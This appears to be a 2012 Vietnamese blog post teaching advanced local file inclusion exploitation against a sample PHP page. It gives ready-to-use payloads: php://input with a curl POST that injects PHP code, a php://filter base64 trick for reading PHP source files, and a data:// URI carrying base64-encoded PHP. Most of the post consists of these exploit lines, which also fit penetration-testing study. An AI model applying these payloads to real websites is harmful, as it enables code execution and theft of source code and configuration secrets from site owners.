Thứ Bảy, 16 tháng 6, 2012

Kỹ thuật LFI nâng cao

Xét 1 file bị lỗi LFI như sau

pentest.php



[+] Sử dụng php://input

-- Yêu cầu :
allow_url_fopen=On
allow_url_include=On

-- Cách khai thác như sau






Code:
curl.exe http://localhost/pentest/pentest.php?page=php://input -d "<?php phpinfo();?>" -o C:\curl.html

[+] Sử dụng php://filter

--Dùng để đọc trực tiếp nội dung file php
-- Cách khai thác




Code:
http://localhost/pentest/pentest.php?page=php://filter/read=convert.base64-encode/resource=pentest.php

[+] Sử dụng data URIs

-- Yêu cầu
allow_url_include=On
-- Cách khai thác




Code:
http://localhost/pentest/pentest.php?page=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==

Download curl

www.mediafire.com/?fiok124cci8d7e4
Chuyên Mục: ,
Người đăng: vào lúc

Không có nhận xét nào:

Đăng ký: Đăng Nhận xét (Atom)